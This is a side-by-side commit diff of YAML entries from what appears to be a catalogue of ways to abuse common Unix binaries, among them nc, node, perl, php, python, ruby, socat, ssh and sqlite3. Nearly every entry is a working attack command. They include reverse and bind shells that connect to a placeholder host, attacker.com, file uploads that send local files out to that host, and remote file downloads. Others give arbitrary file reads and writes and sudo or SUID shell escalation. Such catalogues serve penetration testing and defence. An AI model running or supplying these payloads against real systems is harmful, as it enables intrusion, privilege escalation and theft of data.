- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
nc -l -p $LPORT -e /bin/sh nc -l -p $LPORT -e /bin/sh
upload: upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
on the attacker box to collect the file. code: |
code: | RHOST=attacker.com
RHOST=attacker.com RPORT=12345
RPORT=12345 LFILE=file_to_send
LFILE=file_to_send nc $RHOST $RPORT < "$LFILE"
nc $RHOST $RPORT < "$LFILE"
download: download:
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
< "file_to_send"` on the attacker box to send the file. code: |
code: | LPORT=12345
LPORT=12345 LFILE=file_to_save
LFILE=file_to_save nc -l -p $LPORT > "$LFILE"
nc -l -p $LPORT > "$LFILE"
--- ---

View File

@ -1,19 +1,16 @@
--- ---
description: 'The read file content is corrupted by a leading space added to each description: The read file content is corrupted by a leading space added to each line.
line.
'
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
nl -bn -w1 -s '' $LFILE nl -bn -w1 -s '' $LFILE
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./nl -bn -w1 -s '' $LFILE ./nl -bn -w1 -s '' $LFILE
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo nl -bn -w1 -s '' $LFILE sudo nl -bn -w1 -s '' $LFILE
--- ---

View File

@ -1,38 +1,33 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'' - code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh"); node -e 'sh = require("child_process").spawn("/bin/sh");
net.connect(process.env.RPORT, process.env.RHOST, function () { net.connect(process.env.RPORT, process.env.RHOST, function () {
this.pipe(sh.stdin); this.pipe(sh.stdin);
sh.stdout.pipe(this); sh.stdout.pipe(this);
sh.stderr.pipe(this); sh.stderr.pipe(this);
});' });'
bind-shell-interactive: bind-shell-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
export LPORT=12345 export LPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh"); node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) { require("net").createServer(function (client) {
client.pipe(sh.stdin); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stdout.pipe(client);
sh.stderr.pipe(client); sh.stderr.pipe(client);
}).listen(process.env.LPORT);' }).listen(process.env.LPORT);'
suid-enabled: suid-enabled:
- code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, - code: |
1, 2]});'' ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
'
sudo-enabled: sudo-enabled:
- code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, - code: |
2]});'' sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
'
--- ---

View File

@ -1,18 +1,16 @@
--- ---
description: | description: Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences.
Three spaces are added before each character in the read file, and
non-printable chars are printed as backslash escape sequences.
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
od -An -c -w9999 "$LFILE" od -An -c -w9999 "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./od -An -c -w9999 "$LFILE" ./od -An -c -w9999 "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo od -An -c -w9999 "$LFILE" sudo od -An -c -w9999 "$LFILE"
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: perl -e 'exec "/bin/sh";' - code: perl -e 'exec "/bin/sh";'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
suid-enabled: suid-enabled:
- code: ./perl -e 'exec "/bin/sh";' - code: ./perl -e 'exec "/bin/sh";'
sudo-enabled: sudo-enabled:
- code: sudo perl -e 'exec "/bin/sh";' - code: sudo perl -e 'exec "/bin/sh";'
--- ---

View File

@ -1,50 +1,49 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r 'system(getenv("CMD"));' php -r 'system(getenv("CMD"));'
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r 'passthru(getenv("CMD"));' php -r 'passthru(getenv("CMD"));'
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r 'print(shell_exec(getenv("CMD")));' php -r 'print(shell_exec(getenv("CMD")));'
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));' php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
execute-non-interactive: execute-non-interactive:
- code: | - code: |
export CMD="id" export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
upload: upload:
- description: Serve files in the local folder running an HTTP server. This requires - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
PHP version 5.4 or later. code: |
code: | LHOST=0.0.0.0
LHOST=0.0.0.0 LPORT=8888
LPORT=8888 php -S $LHOST:$LPORT
php -S $LHOST:$LPORT
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
suid-enabled: suid-enabled:
- code: | - code: |
CMD="/bin/sh" CMD="/bin/sh"
./php -r "system('$CMD');" ./php -r "system('$CMD');"
sudo-enabled: sudo-enabled:
- code: | - code: |
CMD="/bin/sh" CMD="/bin/sh"
sudo php -r "system('$CMD');" sudo php -r "system('$CMD');"
--- ---

View File

@ -1,38 +1,36 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
pico -s $TF /etc/hosts pico -s $TF /etc/hosts
^T ^T
file-write: file-write:
- code: | - code: |
pico file_to_write pico file_to_write
^O ^O
file-read: file-read:
- code: 'pico file_to_read - code: pico file_to_read
'
suid-enabled: suid-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
chmod +x $TF chmod +x $TF
./pico -s $TF /etc/hosts ./pico -s $TF /etc/hosts
^T ^T
sudo-enabled: sudo-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
sudo pico -s $TF /etc/hosts sudo pico -s $TF /etc/hosts
^T ^T
--- ---

View File

@ -1,24 +1,23 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- description: The executed command output shown in the puppet log format. - description: The executed command output shown in the puppet log format.
code: | code: |
export CMD="/usr/bin/id" export CMD="/usr/bin/id"
puppet apply -e "exec { '$CMD': logoutput => true }" puppet apply -e "exec { '$CMD': logoutput => true }"
file-write: file-write:
- description: The file path must be absolute. - description: The file path must be absolute.
code: | code: |
export LFILE="/tmp/file_to_write" export LFILE="/tmp/file_to_write"
puppet apply -e "file { '$LFILE': content => 'data' }" puppet apply -e "file { '$LFILE': content => 'data' }"
file-read: file-read:
- description: The read file content is corrupted by the `diff` output format. The - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
actual `/usr/bin/diff` command is executed. code: |
code: | export LFILE=file_to_read
export LFILE=file_to_read puppet filebucket -l diff /dev/null $LFILE
puppet filebucket -l diff /dev/null $LFILE
sudo-enabled: sudo-enabled:
- description: The executed command output shown in the puppet log format. - description: The executed command output shown in the puppet log format.
code: | code: |
export CMD="/usr/bin/id" export CMD="/usr/bin/id"
sudo puppet apply -e "exec { '$CMD': logoutput => true }" sudo puppet apply -e "exec { '$CMD': logoutput => true }"
--- ---

View File

@ -1,39 +1,37 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: python2 -c 'import os; os.system("/bin/sh")' - code: python2 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
upload: upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
HTTP service on the attacker box to collect the file. code: |
code: | export URL=http://attacker.com/
export URL=http://attacker.com/ export LFILE=file_to_send
export LFILE=file_to_send python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))' - description: Serve files in the local folder running an HTTP server.
- description: Serve files in the local folder running an HTTP server. code: |
code: | export LPORT=8888
export LPORT=8888 python2 -m SimpleHTTPServer $LPORT
python2 -m SimpleHTTPServer $LPORT
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
file-write: file-write:
- code: python2 -c 'open("file_to_write","w+").write("data")' - code: python2 -c 'open("file_to_write","w+").write("data")'
file-read: file-read:
- code: python2 -c 'open("file_to_read").read()' - code: python2 -c 'open("file_to_read").read()'
load-library: load-library:
- code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
suid-enabled: suid-enabled:
- code: ./python2 -c 'import os; os.system("/bin/sh -p")' - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
sudo-enabled: sudo-enabled:
- code: sudo python2 -c 'import os; os.system("/bin/sh")' - code: sudo python2 -c 'import os; os.system("/bin/sh")'
--- ---

View File

@ -1,39 +1,37 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")' - code: python3 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
upload: upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
HTTP service on the attacker box to collect the file. code: |
code: | export URL=http://attacker.com/
export URL=http://attacker.com/ export LFILE=file_to_send
export LFILE=file_to_send python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' - description: Serve files in the local folder running an HTTP server.
- description: Serve files in the local folder running an HTTP server. code: |
code: | LPORT=8888
LPORT=8888 python3 -m http.server $LPORT
python3 -m http.server $LPORT
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
file-write: file-write:
- code: python3 -c 'open("file_to_write","w+").write("data")' - code: python3 -c 'open("file_to_write","w+").write("data")'
file-read: file-read:
- code: python3 -c 'open("file_to_read").read()' - code: python3 -c 'open("file_to_read").read()'
load-library: load-library:
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
suid-enabled: suid-enabled:
- code: ./python3 -c 'import os; os.system("/bin/sh -p")' - code: ./python3 -c 'import os; os.system("/bin/sh -p")'
sudo-enabled: sudo-enabled:
- code: sudo python3 -c 'import os; os.system("/bin/sh")' - code: sudo python3 -c 'import os; os.system("/bin/sh")'
--- ---

View File

@ -1,15 +1,14 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: rlwrap /bin/sh - code: rlwrap /bin/sh
file-write: file-write:
- description: This adds timestamps to the output file. This relies on the external - description: This adds timestamps to the output file. This relies on the external `echo` command.
`echo` command. code: |
code: | LFILE=file_to_write
LFILE=file_to_write rlwrap -l "$LFILE" echo data
rlwrap -l "$LFILE" echo data
suid-enabled: suid-enabled:
- code: "./rlwrap -H /dev/null /bin/sh -p" - code: ./rlwrap -H /dev/null /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo rlwrap /bin/sh - code: sudo rlwrap /bin/sh
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}' - code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled: suid-enabled:
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled: sudo-enabled:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled: suid-enabled:
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled: sudo-enabled:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
--- ---

View File

@ -1,33 +1,32 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: ruby -e 'exec "/bin/sh"' - code: ruby -e 'exec "/bin/sh"'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
upload: upload:
- description: Serve files in the local folder running an HTTP server. This requires - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
version 1.9.2 or later. code: |
code: | export LPORT=8888
export LPORT=8888 ruby -run -e httpd . -p $LPORT
ruby -run -e httpd . -p $LPORT
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export RFILE=/file_to_get export RFILE=/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }' ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
file-write: file-write:
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }' - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
file-read: file-read:
- code: ruby -e 'puts File.read("file_to_read")' - code: ruby -e 'puts File.read("file_to_read")'
load-library: load-library:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
sudo-enabled: sudo-enabled:
- code: sudo ruby -e 'exec "/bin/sh"' - code: sudo ruby -e 'exec "/bin/sh"'
--- ---

View File

@ -1,36 +1,36 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
CMD="id" CMD="id"
echo "$CMD" > "$TF" echo "$CMD" > "$TF"
chmod +x "$TF" chmod +x "$TF"
scp -S $TF x y: scp -S $TF x y:
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
RPATH=user@attacker.com:~/file_to_save RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send LPATH=file_to_send
scp $LFILE $RPATH scp $LFILE $RPATH
download: download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RPATH=user@attacker.com:~/file_to_get RPATH=user@attacker.com:~/file_to_get
LFILE=file_to_save LFILE=file_to_save
scp $RPATH $LFILE scp $RPATH $LFILE
sudo-enabled: sudo-enabled:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
CMD="id" CMD="id"
echo "$CMD" > "$TF" echo "$CMD" > "$TF"
chmod +x "$TF" chmod +x "$TF"
sudo scp -S $TF x y: sudo scp -S $TF x y:
suid-limited: suid-limited:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
CMD="id" CMD="id"
echo "$CMD" > "$TF" echo "$CMD" > "$TF"
chmod +x "$TF" chmod +x "$TF"
./scp -S $TF a b: ./scp -S $TF a b:
--- ---

View File

@ -1,24 +1,24 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- description: GNU version only. Also, this requires `bash`. - description: GNU version only. Also, this requires `bash`.
code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
execute-non-interactive: execute-non-interactive:
- description: GNU version only. - description: GNU version only.
code: sed -n "1e id" /etc/hosts code: sed -n "1e id" /etc/hosts
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
sed -n "1s/.*/data/w $LFILE" /etc/hosts sed -n "1s/.*/data/w $LFILE" /etc/hosts
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sed '' "$LFILE" sed '' "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./sed -e '' "$LFILE" ./sed -e '' "$LFILE"
sudo-enabled: sudo-enabled:
- description: GNU version only. Also, this requires `bash`. - description: GNU version only. Also, this requires `bash`.
code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
--- ---

View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: setarch $(arch) /bin/sh - code: setarch $(arch) /bin/sh
suid-enabled: suid-enabled:
- code: "./setarch $(arch) /bin/sh -p" - code: ./setarch $(arch) /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo setarch $(arch) /bin/sh - code: sudo setarch $(arch) /bin/sh
--- ---

View File

@ -1,25 +1,25 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
HOST=user@attacker.com HOST=user@attacker.com
sftp $HOST sftp $HOST
!/bin/sh !/bin/sh
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
put file_to_send file_to_save put file_to_send file_to_save
download: download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
get file_to_get file_to_save get file_to_get file_to_save
sudo-enabled: sudo-enabled:
- code: | - code: |
HOST=user@attacker.com HOST=user@attacker.com
sudo sftp $HOST sudo sftp $HOST
!/bin/sh !/bin/sh
--- ---

View File

@ -2,16 +2,16 @@
description: The read file content is corrupted by adding a newline. description: The read file content is corrupted by adding a newline.
functions: functions:
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
shuf -e data -o "$LFILE" shuf -e data -o "$LFILE"
suid-enabled: suid-enabled:
- description: - description:
code: | code: |
LFILE=file_to_write LFILE=file_to_write
./shuf -e data -o "$LFILE" ./shuf -e data -o "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
sudo shuf -e data -o "$LFILE" sudo shuf -e data -o "$LFILE"
--- ---

View File

@ -1,16 +1,14 @@
--- ---
functions: functions:
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell. code: |
code: | RHOST=attacker.com
RHOST=attacker.com RPORT=12345
RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive: bind-shell-interactive:
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> - description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
on the attacker box to connect to the shell. code: |
code: | LPORT=12345
LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
--- ---

View File

@ -1,15 +1,15 @@
--- ---
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sort -m "$LFILE" sort -m "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./sort -m "$LFILE" ./sort -m "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo sort -m "$LFILE" sudo sort -m "$LFILE"
--- ---

View File

@ -1,21 +1,21 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: sqlite3 /dev/null '.shell /bin/sh' - code: sqlite3 /dev/null '.shell /bin/sh'
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";' sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sqlite3 << EOF sqlite3 << EOF
CREATE TABLE t(line TEXT); CREATE TABLE t(line TEXT);
.import $LFILE t .import $LFILE t
SELECT * FROM t; SELECT * FROM t;
EOF EOF
sudo-enabled: sudo-enabled:
- code: sudo sqlite3 /dev/null '.shell /bin/sh' - code: sudo sqlite3 /dev/null '.shell /bin/sh'
suid-limited: suid-limited:
- code: "./sqlite3 /dev/null '.shell /bin/sh'" - code: "./sqlite3 /dev/null '.shell /bin/sh'"
--- ---

View File

@ -1,32 +1,30 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- description: Reconnecting may help bypassing restricted shells. - description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option. - description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
x
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
RPATH=file_to_save RPATH=file_to_save
LPATH=file_to_send LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH ssh $HOST "cat > $RPATH" < $LPATH
download: download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
RPATH=file_to_get RPATH=file_to_get
LPATH=file_to_save LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH ssh $HOST "cat $RPATH" > $LPATH
file-read: file-read:
